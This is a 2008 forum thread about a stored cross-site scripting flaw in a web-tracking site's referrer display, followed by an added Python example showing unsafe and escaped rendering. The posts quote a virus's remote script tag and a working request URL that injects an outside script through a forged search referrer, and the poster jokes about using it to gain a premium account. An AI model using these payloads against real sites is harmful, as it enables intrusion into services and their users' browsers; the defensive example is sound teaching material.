Topic: "eXTReMe Tracking XSS" (page 1 of 1)

Author Post
quangntenemy
I use this one to track visitors coming to my blog.
Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:
<script src=http://121.15.220.104/1.js></script>

which is the signature for the virus.

Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:
http://www.flickr.com/photos/22823442@N02/2195246062/
What happened? No, neither my comp nor any other computer around was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted into the page.

Now let's see if I can "forge" the referer to insert my own script to the page :)
alt3rn4tiv3
Haha. The ad writes "&#22909;&#28040;&#24687;", aka "good news" :D

P.S. Forum is not asian-languages compatible.
Edited by alt3rn4tiv3 on 15.01.2008 14:15:20
quangntenemy
I finally managed to reproduce the XSS in a "nice" way :)
First you need to request the page:
http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search
Then wait for a few minutes and you'll see the xss here: http://extremetracking.com/open;ref1?login=qpenguin
Screenshot:
http://www.flickr.com/photos/22823442@N02/2194552167/

Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one :)
Edited by quangntenemy on 18.01.2008 06:57:43
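The flaw discussed in this thread (a URL-decoded referrer written into the stats page without output encoding) next to a hardened renderer, as an added example that is not part of the original posts and is not eXTReMe Tracking's code. The function names, the `demo` login and the `attacker.invalid` host are assumptions; only the `l` parameter name is taken from the request quoted above.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed tracking hit. Only the `l` parameter name comes from the thread;
# the login and the attacker.invalid host are placeholders.
SAMPLE_HIT = ("login=demo&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D"
              "%3Cscript+src%3Dhttp%3A//attacker.invalid/x.js%3E%3C/script%3E")


def stored_referrer(hit_query):
    """URL-decode the hit and return the referrer the tracker would store."""
    return parse_qs(hit_query)["l"][0]


def search_term(referrer):
    """Pull the search query (`q`) out of a search-engine referrer."""
    return parse_qs(urlsplit(referrer).query).get("q", [""])[0]


def render_unsafe(referrer):
    # The flaw from the thread: decoded, attacker-controlled text is written
    # into the stats page as markup.
    return "<td>" + search_term(referrer) + "</td>"


def render_safe(referrer):
    # Store the raw value, encode at output time for the context it lands in,
    # and only link to http(s) referrers.
    scheme = urlsplit(referrer).scheme.lower()
    href = referrer if scheme in ("http", "https") else "#"
    return '<td><a href="%s" rel="nofollow noreferrer">%s</a></td>' % (
        html.escape(href, quote=True),
        html.escape(search_term(referrer), quote=True),
    )


if __name__ == "__main__":
    ref = stored_referrer(SAMPLE_HIT)
    print("unsafe:", render_unsafe(ref))
    print("safe:  ", render_safe(ref))
```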
unknown user
jup that's pretty bad.
